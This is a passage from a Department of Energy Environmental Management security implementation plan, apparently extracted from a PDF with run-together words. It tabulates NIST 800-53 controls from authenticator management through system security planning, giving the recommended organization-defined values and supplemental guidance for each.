The organization managesinformation systemauthenticators by: Protectingauthenticator content fromunauthorized disclosure andmodification;
IA-5 0 iAuthenticatorManagement
The organization managesinformation systemauthenticators by: Requiringindividuals to take, andhaving devices implement,specific security safeguardsto protect authenticators;and
IA-5 0 jAuthenticatorManagement
The organization managesinformation systemauthenticators by: Changingauthenticators for group/roleaccounts when membershipto those accounts changes
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
88 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-5 1 aAuthenticatorManagement
The information system, forpassword-basedauthentication: Enforcesminimum passwordcomplexity of [Assignment:organization-definedrequirements for casesensitivity, number ofcharacters, mix of upper-case letters, lower-caseletters, numbers, and specialcharacters, includingminimum requirements foreach type];
At least sixteencharacters, at leastsixteen nonblank
characters, combinationof letters, numbers, and
at least one specialcharacter in the first
seven positions, do notcontain user ID, no
simple pattern of lettersor numbers
IA-5 1 bAuthenticatorManagement
The information system, forpassword-basedauthentication: Enforces atleast the following numberof changed characters whennew passwords are created:[Assignment: organization-defined number];
At least 4 characters
IA-5 1 cAuthenticatorManagement
The information system, forpassword-basedauthentication: Stores andtransmits only encryptedrepresentations ofpasswords;
IA-5 1 dAuthenticatorManagement
The information system, forpassword-basedauthentication: Enforcespassword minimum andmaximum lifetimerestrictions of [Assignment:organization definednumbers for lifetimeminimum, lifetimemaximum];
Minimum of one day,maximum of 90 days
IA-5 1 eAuthenticatorManagement
The information system, forpassword-basedauthentication: Prohibitspassword reuse for[Assignment: organization-defined number]generations; and
24
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
89 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-5 1 fAuthenticatorManagement
The information system, forpassword-basedauthentication: Allows theuse of a temporary passwordfor system logons with animmediate change to apermanent password.
IA-5 2 aAuthenticatorManagement
The information system, forPKI-based authentication:Validates certifications byconstructing and verifying acertification path to anaccepted trust anchorincluding checkingcertificate statusinformation;
IA-5 2 bAuthenticatorManagement
The information system, forPKI-based authentication:Enforces authorized accessto the corresponding privatekey;
IA-5 2 cAuthenticatorManagement
The information system, forPKI-based authentication:Maps the authenticatedidentity to the account of theindividual or group; and
IA-5 2 dAuthenticatorManagement
The information system, forPKI-based authentication:Implements a local cache ofrevocation data to supportpath discovery andvalidation in case ofinability to accessrevocation information viathe network.
IA-5 3AuthenticatorManagement
The organization requiresthat the registration processto receive [Assignment:organization defined typesof and/or specificauthenticators] be conducted[Selection: in person; by atrusted third party] before[Assignment: organization-defined registrationauthority] with authorizationby [Assignment:organization-definedpersonnel or roles].
Two-factorauthenticators and/or
encryption keys
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
90 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-5 11
The information system, forhardware token-basedauthentication, employsmechanisms that satisfy[Assignment: organization-defined token qualityrequirements].
IA-6Authenticator
Feedback
The information systemobscures feedback ofauthentication informationduring the authenticationprocess to protect theinformation from possibleexploitation/use byunauthorized individuals.
IA-7Cryptographic Module
Authentication
The information systemimplements mechanisms forauthentication to acryptographic module thatmeet the requirements ofapplicable federal laws,Executive Orders,directives, policies,regulations, standards, andguidance for suchauthentication.
IA-8Identification and
Authentication (Non-Organizational Users)
The information systemuniquely identifies andauthenticates non-organizational users (orprocesses acting on behalfof non-organizational users).
Non-organizational usersinclude all informationsystem users other thanorganizational usersexplicitly covered by IA-2.
IA-8 1Identification and
Authentication (Non-Organizational Users)
The information systemaccepts and electronicallyverifies Personal IdentityVerification (PIV)credentials from otherfederal agencies.
IA-8 2Identification and
Authentication (Non-Organizational Users)
The information systemaccepts only FICAM-approved third-partycredentials
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
91 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IA-8 3Identification and
Authentication (Non-Organizational Users)
The organization employsonly FICAM-approvedinformation systemcomponents in [Assignment:organization-definedinformation systems] toaccept third-partycredentials.
IA-8 4Identification and
Authentication (Non-Organizational Users)
The information systemconforms to FICAM-issuedprofiles.
IR-1 0 a 1Incident Response
Policy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:An incident response policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance;
Security Staff andAdministrative Staff
IR-1 0 a 2Incident Response
Policy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of theincident response policy andassociated incident responsecontrols; and
Security Staff andAdministrative Staff
IR-1 0 b 1Incident Response
Policy and Procedures
The organization: Reviewsand updates the current:Incident response policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
IR-1 0 b 2Incident Response
Policy and Procedures
The organization: Reviewsand updates the current:Incident responseprocedures [Assignment:organization-definedfrequency].
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
92 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IR-2 0 aIncident Response
Training
The organization providesincident response training toinformation system usersconsistent with assignedroles and responsibilities:Within [Assignment:organization-defined timeperiod] of assuming anincident response role orresponsibility;
Six weeks
Incident response trainingincludes user training in theidentification and reportingof suspicious activities, bothfrom external and internalsources.
IR-2 0 bIncident Response
Training
The organization providesincident response training toinformation system usersconsistent with assignedroles and responsibilities:When required byinformation system changes;and
IR-2 0 cIncident Response
Training
The organization providesincident response training toinformation system usersconsistent with assignedroles and responsibilities:[Assignment: organization-defined frequency]thereafter.
Annually
IR-3 0Incident Response
Testing and Exercises
The organization tests theincident response capabilityfor the information system[Assignment: organization-defined frequency] using[Assignment: organization-defined tests] to determinethe incident responseeffectiveness and documentsthe results.
The site test exercisesincident responsescenarios at leastannually; this willinclude detection,
analysis, containment,eradication and
recovery
IR-3 2Incident Response
Testing and Exercises
The organizationcoordinates incidentresponse testing withorganizational elementsresponsible for relatedplans.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
93 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IR-4 0 a Incident Handling
The organization:Implements an incidenthandling capability forsecurity incidents thatincludes preparation,detection and analysis,containment, eradication,and recovery;
IR-4 0 b Incident Handling
The organization:Coordinates incidenthandling activities withcontingency planningactivities; and
IR-4 0 c Incident Handling
The organization:Incorporates lessons learnedfrom ongoing incidenthandling activities intoincident responseprocedures, training, andtesting/exercises, andimplements the resultingchanges accordingly.
IR-4 1 Incident Handling
The organization employsautomated mechanisms tosupport the incidenthandling process.
IR-5 0 Incident MonitoringThe organization tracks anddocuments informationsystem security incidents
IR-6 0 a Incident Reporting
The organization: Requirespersonnel to reportsuspected security incidentsto the organizationalincident response capabilitywithin [Assignment:organization-defined timeperiod]; and
Immediately upondetection if the incident
is thought to involvePII or two hours for
moderate categorizedsystems for all other
types of incidents
EM requires that the EMCSPM and the EM -1 benotified when PII of 100 ormore is affected or in the caseof a release of classifiedinformation into the publicdomain.
IR-6 0 b Incident Reporting
The organization: Reportssecurity incidentinformation to [Assignment:organization-definedauthorities].
JC3
IR-6 1 Incident Reporting
The organization employsautomated mechanisms toassist in the reporting ofsecurity incidents.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
94 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IR-7 0Incident Response
Assistance
The organization providesan incident response supportresource, integral to theorganizational incidentresponse capability thatoffers advice and assistanceto users of the informationsystem for the handling andreporting of securityincidents.
IR-7 1Incident Response
Assistance
The organization employsautomated mechanisms toincrease the availability ofincident response relatedinformation and support.
IR-8 0 a 1Incident Response
Plan
The organization: Developsan incident response planthat: Provides theorganization with a roadmapfor implementing itsincident response capability;
It is important thatorganizations have a formal,focused, and coordinatedapproach to responding toincidents. The organization’smission, strategies, and goalsfor incident response helpdetermine the structure of itsincident response capability.
IR-8 0 a 2Incident Response
Plan
The organization: Developsan incident response planthat: Describes the structureand organization of theincident response capability;
IR-8 0 a 3Incident Response
Plan
The organization: Developsan incident response planthat: Provides a high-levelapproach for how theincident response capabilityfits into the overallorganization;
IR-8 0 a 4Incident Response
Plan
The organization: Developsan incident response planthat: Meets the uniquerequirements of theorganization, which relate tomission, size, structure, andfunctions;
IR-8 0 a 5Incident Response
Plan
The organization: Developsan incident response planthat: Defines reportableincidents;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
95 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IR-8 0 a 6Incident Response
Plan
The organization: Developsan incident response planthat: Provides metrics formeasuring the incidentresponse capability withinthe organization;
IR-8 0 a 7Incident Response
Plan
The organization: Developsan incident response planthat: Defines the resourcesand management supportneeded to effectivelymaintain and mature anincident response capability;and
IR-8 0 a 8Incident Response
Plan
The organization: Developsan incident response planthat: Is reviewed andapproved by [Assignment:organization-definedpersonnel or roles];
Incident response team
IR-8 0 bIncident Response
Plan
The organization:Distributes copies of theincident response plan to[Assignment: organization-defined incident responsepersonnel (identified byname and/or by role) andorganizational elements];
IR-8 0 cIncident Response
Plan
The organization: Reviewsthe incident response plan[Assignment: organization-defined frequency];
Annually
IR-8 0 dIncident Response
Plan
The organization: Updatesthe incident response plan toaddresssystem/organizationalchanges or problemsencountered during planimplementation, execution,or testing;
IR-8 0 eIncident Response
Plan
The organization:Communicates incidentresponse plan changes to[Assignment: organization-defined incident responsepersonnel (identified byname and/or by role) andorganizational elements];and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
96 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
IR-8 0 fIncident Response
Plan
The organization: Protectsthe incident response planfrom unauthorizeddisclosure and modification.
MA-1
a -Maintenance Policy
and Procedures
The organization: a.Develops, documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A system maintenancepolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
MA-1
a -Maintenance Policy
and Procedures
The organization: a.Develops, documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thesystem maintenance policyand associated systemmaintenance controls; and
Security Staff andAdministrative Staff
MA-1
b -Maintenance Policy
and Procedures
The organization: Reviewsand updates the current:System maintenance policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
MA-1
b -Maintenance Policy
and Procedures
The organization: Reviewsand updates the current:System maintenanceprocedures [Assignment:organization-definedfrequency].
Annually or any timethere is a major change
MA-2
a -Controlled
Maintenance
The organization schedules,performs, documents, andreviews records ofmaintenance and repairs oninformation systemcomponents in accordancewith manufacturer or vendorspecifications and/ororganizational requirements;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
97 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
MA-2
b -Controlled
Maintenance
The organization approvesand monitors allmaintenance activities,whether performed on siteor remotely and whether theequipment is serviced onsite or removed to anotherlocation;
MA-2
c -Controlled
Maintenance
The organization requiresthat [Assignment:organization-definedpersonnel or roles] explicitlyapprove the removal of theinformation system orsystem components fromorganizational facilities foroff-site maintenance orrepairs;
MA-2
d -Controlled
Maintenance
The organization sanitizesequipment to remove allinformation from associatedmedia prior to removal fromorganizational facilities foroff-site maintenance orrepairs; and
MA-2
e -Controlled
Maintenance
The organization checks allpotentially impactedsecurity controls to verifythat the controls are stillfunctioning properlyfollowing maintenance orrepair actions.
MA-2
f -Controlled
Maintenance
The organization includes[Assignment: organization-defined maintenance-relatedinformation] inorganizational maintenancerecords.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
98 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
MA-3
- Maintenance Tools
The organization approves,controls, and monitorsinformation systemmaintenance tools.
The intent of this control is toaddress the security-relatedissues arising from thehardware and softwarebrought into the informationsystem specifically fordiagnostic and repair actions(e.g., a hardware or softwarepacket sniffer that isintroduced for the purpose ofa particular maintenanceactivity).
MA-3
1 - Maintenance Tools
The organization inspectsthe maintenance toolscarried into a facility bymaintenance personnel forimproper or unauthorizedmodifications.
MA-3
2 - Maintenance Tools
The organization checksmedia containing diagnosticand test programs formalicious code before themedia are used in theinformation system.
MA-4
a -Non-Local
Maintenance
The organization approvesand monitors non-localmaintenance and diagnosticactivities;
Non-local maintenance anddiagnostic activities are thoseactivities conducted byindividuals communicatingthrough a network; either anexternal network (e.g., theInternet) or an internalnetwork.
MA-4
b -Non-Local
Maintenance
The organization allows theuse of non-localmaintenance and diagnostictools only as consistent withorganizational policy anddocumented in the securityplan for the informationsystem;
MA-4
c -Non-Local
Maintenance
The organization employsstrong authenticators in theestablishment of nonlocalmaintenance and diagnosticsessions;
MA-4
d -Non-Local
Maintenance
The organization maintainsrecords for non-localmaintenance and diagnosticactivities; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
99 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
MA-4
e -Non-Local
Maintenance
The organization terminatessession and networkconnections when non-localmaintenance is completed.
MA-4
2 -Non-Local
Maintenance
The organization documentsin the security plan for theinformation system, thepolicies and procedures forthe establishment and use ofnonlocal maintenance anddiagnostic connections.
MA-5
a -Maintenance
Personnel
The organization establishesa process for maintenancepersonnel authorization andmaintains a list ofauthorized maintenanceorganizations or personnel;
MA-5
b -Maintenance
Personnel
The organization ensuresthat non-escorted personnelperforming maintenance onthe information system haverequired accessauthorizations; and
MA-5
c -Maintenance
Personnel
The organization designatesorganizational personnelwith required accessauthorizations and technicalcompetence to supervise themaintenance activities ofpersonnel who do notpossess the required accessauthorizations.
MA-6
- Timely Maintenance
The organization obtainsmaintenance support and/orspare parts for [Assignment:organization-definedinformation systemcomponents] within[Assignment: organization-defined time period] offailure.
The organization specifiesthose information systemcomponents that, when notoperational, result inincreased risk toorganizations, individuals, orthe Nation because thesecurity functionalityintended by that componentis not being provided.Security-critical componentsinclude, for example,firewalls, guards, gateways,intrusion detection systems,audit repositories,authentication servers, andintrusion prevention systems.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
100 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
MP-1
a 1Media Protection
Policy and Procedures
The organization develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:a media protection policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
MP-1
a 2Media Protection
Policy and Procedures
The organization develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of the mediaprotection policy andassociated media protectioncontrols; and
Security Staff andAdministrative Staff
MP-1
b 1Media Protection
Policy and Procedures
The organization reviewsand updates the current:Media protection policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
MP-1
b 2Media Protection
Policy and Procedures
The organization reviewsand updates the current:Media protection procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
101 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
MP-2
- Media Access
The organization restrictsaccess to [Assignment:organization-defined typesof digital and/or non-digitalmedia] to [Assignment:organization-definedpersonnel or roles].
Information system mediaincludes both digital media(e.g., diskettes, magnetictapes, external/removablehard drives, flash/thumbdrives, compact disks, digitalvideo disks) and non-digitalmedia (e.g., paper,microfilm). This control alsoapplies to mobile computingand communications deviceswith information storagecapability (e.g.,notebook/laptop computers,personal digital assistants,cellular telephones, digitalcameras, and audio recordingdevices). Controlledunclassified information(e.g., Official Use Only,Personally IdentifiableInformation, UnclassifiedControlled NuclearInformation (UCNI),Sensitive SecurityInformation). Thoseindividuals with definedbusiness requirement. Groupor other assigned accessrestrictions which are clearlydocumented.
MP-3
a - Media Marking
The organization marksinformation system mediaindicating the distributionlimitations, handlingcaveats, and applicablesecurity markings (if any) ofthe information; and
MP-3
b - Media Marking
The organization exempts[Assignment: organization-defined types of informationsystem media] frommarking as long as themedia remain within[Assignment: organization-defined controlled areas]
This applies to media thatwould remain in anoperational component that isinstalled in a limited accessarea where the physicalcontrol of the assigned deviceis assigned and tracked to anindividual in the DOEphysically controlled space.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
102 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
MP-4
a - Media Storage
The organization physicallycontrols and securely stores[Assignment: organization-defined types of digitaland/or non-digital media]within [Assignment:organization-definedcontrolled areas]; and
All digital and non-digital controlled
unclassifiedinformation (e.g.,
backup tapes,external/removable
hard drives,flash/thumb drives,
compact discs, DVDs)
MP-4
b - Media Storage
The organization protectsinformation system mediauntil the media aredestroyed or sanitized usingapproved equipment,techniques, and procedures.
MP-5
a - Media Transport
The organization: Protectsand controls [Assignment:organization-defined typesof information systemmedia] during transportoutside of controlled areasusing [Assignment:organization-definedsecuritysafeguards];
All digital and non-digital controlled
unclassifiedinformation (e.g.,
backup tapes,external/removable
hard drives,flash/thumb drives,
compact discs, DVDs)- using FIPS 140-2
This control also applies tomobile computing andcommunications devices withinformation storagecapability (e.g.,notebook/laptop computers,personal digital assistants,cellular telephones, digitalcameras, and audio recordingdevices) that are transportedoutside of controlled areas.
MP-5
b - Media Transport
The organization:Maintains accountability forinformation system mediaduring transport outside ofcontrolled areas;
MP-5
c - Media Transport
The organization:Documents activitiesassociated with the transportof information systemmedia; and
MP-5
d - Media Transport
The organization: Restrictsthe activities associated withthe transport of informationsystem media to authorizedpersonnel.
MP-5
4 - Media Transport
The information systemimplements cryptographicmechanisms to protect theconfidentiality and integrityof information stored ondigital media duringtransport outside ofcontrolled areas.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
103 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
MP-6
a - Media Sanitization
The organization: Sanitizes[Assignment: organization-defined information systemmedia] prior to disposal,release out of organizationalcontrol, or release for reuseusing [Assignment:organization definedsanitization techniques andprocedures] in accordancewith applicable federal andorganizational standards andpolicies; and
This control applies to allmedia subject to disposal orreuse, whether or notconsidered removable.
MP-6
b - Media Sanitization
The organization: Employssanitization mechanismswith the strength andintegrity commensurate withthe security category orclassification of theinformation.
As an example, all mediaused in NSS would bedestroyed via a shredder and/or degaussing.
MP-7
Media Use
The organization [Selection:restricts; prohibits] the useof [Assignment:organization defined typesof information systemmedia] on [Assignment:organization-definedinformation systems orsystem components] using[Assignment: organization-defined security safeguards].
MP-7
1 Media Use
The organization prohibitsthe use of portable storagedevices in organizationalinformation systems whensuch devices have noidentifiable owner.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
104 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PE-1 0 a 1
Physical andEnvironmental
Protection Policy andProcedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A physical andenvironmental protectionpolicy that addressespurpose, scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
PE-1 0 a 2
Physical andEnvironmental
Protection Policy andProcedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thephysical and environmentalprotection policy andassociated physical andenvironmental protectioncontrols; and
Security Staff andAdministrative Staff
PE-1 0 b 1
Physical andEnvironmental
Protection Policy andProcedures
The organization reviewsand updates the current:Physical and environmentalprotection policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
PE-1 0 b 2
Physical andEnvironmental
Protection Policy andProcedures
The organization reviewsand updates the current:Physical and environmentalprotection procedures[Assignment: organization-defined frequency].
Annually or any timethere is a major change
PE-2 0 aPhysical AccessAuthorizations
The organization: Develops,approves, and maintains alist of individuals withauthorized access to thefacility where theinformation system resides;
PE-2 0 bPhysical AccessAuthorizations
The organization: Issuesauthorization credentials forfacility access;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
105 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PE-2 0 cPhysical AccessAuthorizations
The organization: Reviewsthe access list detailingauthorized facility access byindividuals [Assignment:organization-definedfrequency]; and
Every 6 months
PE-2 0 dPhysical AccessAuthorizations
The organization: Removesindividuals from the facilityaccess list when access is nolonger required.
PE-3 0 a 1Physical Access
Control
The organization: Enforcesphysical accessauthorizations at[Assignment: organization-defined entry/exit points tothe facility where theinformation system resides]by; Verifying individualaccess authorizations beforegranting access to thefacility; and
PE-3 0 a 2Physical Access
Control
The organization: Enforcesphysical accessauthorizations at[Assignment: organization-defined entry/exit points tothe facility where theinformation system resides]by; Controllingingress/egress to the facilityusing [Selection (one ormore): [Assignment:organization-definedphysical access controlsystems/devices]; guards];
PE-3 0 bPhysical Access
Control
The organization: Maintainsphysical access audit logsfor [Assignment:organization-definedentry/exit points];
PE-3 0 cPhysical Access
Control
The organization: Provides[Assignment: organization-defined security safeguards]to control access to areaswithin the facility officiallydesignated as publiclyaccessible;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
106 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PE-3 0 dPhysical Access
Control
The organization: Escortsvisitors and monitors visitoractivity [Assignment:organization-definedcircumstances requiringvisitor escorts andmonitoring];
PE-3 0 ePhysical Access
Control
The organization: Secureskeys, combinations, andother physical accessdevices;
PE-3 0 fPhysical Access
Control
The organization:Inventories [Assignment:organization-definedphysical access devices]every [Assignment:organization-definedfrequency]; and
Every 6 months
PE-3 0 gPhysical Access
Control
The organization: Changescombinations and keys[Assignment: organization-defined frequency] and/orwhen keys are lost,combinations arecompromised, or individualsare transferred orterminated.
Every 6 months forcombinations. Key
locks should bechanges when anindividual leaves.
PE-4 0Access Control for
Transmission Medium
The organization controlsphysical access to[Assignment: organization-defined information systemdistribution andtransmission lines] withinorganizational facilitiesusing [Assignment:organization-definedsecurity safeguards].
PE-5 0Access Control for
Output Devices
The organization controlsphysical access toinformation system outputdevices to preventunauthorized individualsfrom obtaining the output.
PE-6 0 aMonitoring Physical
Access
The organization: Monitorsphysical access to thefacility where theinformation system residesto detect and respond tophysical security incidents;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
107 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PE-6 0 bMonitoring Physical
Access
The organization: Reviewsphysical access logs[Assignment: organization-defined frequency] and uponoccurrence of [Assignment:organization-defined eventsor potential indications ofevents]; and
Every 6 months
PE-6 0 cMonitoring Physical
Access
The organization:Coordinates results ofreviews and investigationswith the organizationalincident response capability.
PE-6 1Monitoring Physical
Access
The organization monitorsphysical intrusion alarmsand surveillance equipment.
PE-8 0 aVisitor Access
Records
The organization maintainsvisitor access records to thefacility where theinformation system residesfor [Assignment:organization-defined timeperiod]; and
PE-8 0 bVisitor Access
Records
The organization reviewsvisitor access records[Assignment: organization-defined frequency].
Every 6 months
PE-9 0Power Equipment and
Power Cabling
The organization protectspower equipment and powercabling for the informationsystem from damage anddestruction.
PE-10
0 a Emergency Shutoff
The organization providesthe capability of shutting offpower to the informationsystem or individual systemcomponents in emergencysituations;
PE-10
0 b Emergency Shutoff
The organization placesemergency shutoff switchesor devices in [Assignment:organization-definedlocation by informationsystem or systemcomponent] to facilitate safeand easy access forpersonnel; and
A single room orenvironment within
datacenters and otherareas with a significantamount of IT resources
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
108 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PE-10
0 c Emergency Shutoff
The organization protectsemergency power shutoffcapability fromunauthorized activation.
PE-11
0 Emergency Power
The organization provides ashort-term uninterruptiblepower supply to facilitate[Selection (one or more): anorderly shutdown of theinformation system;transition of the informationsystem to long-termalternate power] in theevent of a primary powersource loss.
PE-12
0 Emergency Lighting
The organization employsand maintains automaticemergency lighting for theinformation system thatactivates in the event of apower outage or disruptionand that covers emergencyexits and evacuation routeswithin the facility.
For small equipment roomsseveral home styleemergency lights available atmost hardware stores issufficient for emergencylighting. In large datacenters, these would not besuitable.
PE-13
0 Fire Protection
The organization employsand maintains firesuppression and detectiondevices/systems for theinformation system that aresupported by an independentenergy source.
PE-13
3 Fire Protection
The organization employsan automatic firesuppression capability forthe information systemwhen the facility is notstaffed on a continuousbasis.
PE-14
0 aTemperature and
Humidity Controls
The organization maintainstemperature and humiditylevels within the facilitywhere the informationsystem resides at[Assignment: organization-defined acceptable levels];and
68-77 degreesFahrenheit, 45-55%
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
109 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PE-14
0 bTemperature and
Humidity Controls
The organization monitorstemperature and humiditylevels [Assignment:organization-definedfrequency].
Daily
PE-15
0Water Damage
Protection
The organization protectsthe information system fromdamage resulting from waterleakage by providing mastershutoff or isolation valvesthat are accessible, workingproperly, and known to keypersonnel.
PE-16
0 Delivery and Removal
The organization authorizes,monitors, and controls[Assignment: organization-defined types of informationsystem components]entering and exiting thefacility and maintainsrecords of those items.
Alltelecommunications orIT related devices (can
be over certain $threshold)
PE-17
0 a Alternate Work Site
The organization employs[Assignment: organization-defined security controls] atalternate work sites;
All management,operational, and
technical informationsystem security
controls
PE-17
0 b Alternate Work Site
The organization assesses asfeasible, the effectiveness ofsecurity controls at alternatework sites; and
PE-17
0 c Alternate Work Site
The organization provides ameans for employees tocommunicate withinformation securitypersonnel in case of securityincidents or problems.
PL-1 0 a 1Security Planning
Policy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:A security planning policythat addresses purpose,scope, roles,responsibilities,management commitment,coordination amongorganizational entities, andcompliance; and
Security Staff andAdministrative Staff
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
110 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PL-1 0 a 2Security Planning
Policy and Procedures
The organization: Develops,documents, anddisseminates to[Assignment: organization-defined personnel or roles]:Procedures to facilitate theimplementation of thesecurity planning policy andassociated security planningcontrols; and
Security Staff andAdministrative Staff
PL-1 0 b 1Security Planning
Policy and Procedures
The organization: Reviewsand updates the current:Security planning policy[Assignment: organization-defined frequency]; and
Annually or any timethere is a major change
PL-1 0 b 2Security Planning
Policy and Procedures
The organization: Reviewsand updates the current:Security planningprocedures [Assignment:organization-definedfrequency].
Annually or any timethere is a major change
PL-2 0 a 1 System Security Plan
The organization: Developsa security plan for theinformation system that: Isconsistent with theorganization’s enterprisearchitecture;
The EM eGovRPMrepository must be used tocreate and maintain a securityplan and to store any securityrelated documentation.
PL-2 0 a 2 System Security Plan
The organization: Developsa security plan for theinformation system that:Explicitly defines theauthorization boundary forthe system;
PL-2 0 a 3 System Security Plan
The organization: Developsa security plan for theinformation system that:Describes the operationalcontext of the informationsystem in terms of missionsand business processes;
PL-2 0 a 4 System Security Plan
The organization: Developsa security plan for theinformation system that:Provides the securitycategorization of theinformation systemincluding supportingrationale;
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
111 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PL-2 0 a 5 System Security Plan
The organization: Developsa security plan for theinformation system that:Describes the operationalenvironment for theinformation system andrelationships with orconnections to otherinformation systems;
PL-2 0 a 6 System Security Plan
The organization: Developsa security plan for theinformation system that:Provides an overview of thesecurity requirements for thesystem;
PL-2 0 a 7 System Security Plan
The organization: Developsa security plan for theinformation system that:Identifies any relevantoverlays, if applicable;
PL-2 0 a 8 System Security Plan
The organization: Developsa security plan for theinformation system that:Describes the securitycontrols in place or plannedfor meeting thoserequirements including arationale for the tailoringand supplementationdecisions; and
PL-2 0 a 9 System Security Plan
The organization: Developsa security plan for theinformation system that: Isreviewed and approved bythe authorizing official ordesignated representativeprior to planimplementation;
PL-2 0 b System Security Plan
The organization distributescopies of the security planand communicatessubsequent changes to theplan to [Assignment:organization-definedpersonnel or roles];
Security Staff,Administrative Staff,the AODR & the AO
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
112 of 266
Cntl.#
En
han
cem
ent
#
# - Control NameNIST ControlRequirements
Recommendorganizationallydefined values
EM SupplementalGuidance
PL-2 0 c System Security Plan
The organization reviewsthe security plan for theinformation system[Assignment: organization-defined frequency];
Annually
PL-2 0 d System Security Plan
The organization updatesthe plan to address changesto the informationsystem/environment ofoperation or problemsidentified during planimplementation or securitycontrol assessments; and
PL-2 0 e System Security Plan
The organization protectsthe security plan fromunauthorized disclosure andmodification.
PL-2 3 System Security Plan
